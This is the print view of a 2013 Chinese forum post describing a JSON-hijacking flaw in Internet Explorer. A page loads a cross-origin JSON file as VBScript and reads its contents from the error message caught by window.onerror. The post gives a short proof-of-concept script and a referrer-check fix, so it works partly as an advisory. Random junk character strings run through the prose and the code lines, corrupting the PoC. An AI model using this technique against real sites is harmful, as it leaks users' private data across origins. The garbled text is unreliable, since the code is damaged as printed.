中国网络渗透测试联盟

标题: IE通用JSON劫持漏洞 [打印本页]

作者: admin    时间: 2013-2-23 11:33
标题: IE通用JSON劫持漏洞
简要描述:
! H$ `; z/ l6 z. M' D  m# b# o
9 v/ Z  n6 j5 e由于某些资源容器对数据处理不当导致json劫持漏洞.
2 o: f7 z- A% u* V2 k& `详细说明:0 y6 [, ?) v" q# {( L; V- h% D9 R
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
0 E, |: x4 m, h% d<script language=vbscript></script>
% x- }4 n/ j- h* }- s8 a 3 k, h0 p! D7 \4 g/ F$ T3 G
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
* x6 e" H) \! d2 K8 V漏洞证明:3 X( I7 b7 y& W6 s$ d
<script>7 y3 o, V4 |- d+ E) j
window.onerror=function(_){
/ z. z% {" r$ F" xalert(_)
2 ^9 }4 U! H  ~* Q: N9 r" t}. V3 {2 W% A4 m2 K4 p3 u
</script>3 \+ k6 ^: E+ A# @/ y3 E$ `
<script language=vbscript src=1.json></script>
: L2 [: ?" d0 z! \4 w, N   a" ~' v; P4 a# }# _& C4 a# [

/ P% U5 H- q8 ~! `4 F" R2 H$ ]+ U1.json:2 m8 W+ a3 y  G! H9 B
[{"name":"sogili","age":19}]
0 X7 L7 E+ s3 b6 i! E2 A9 v, `% q- S) Q修复方案:
  v/ {& m8 p. u( F( g( }( ^网站业务对于这个问题可以通过验证referrer是否为同源来防御




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2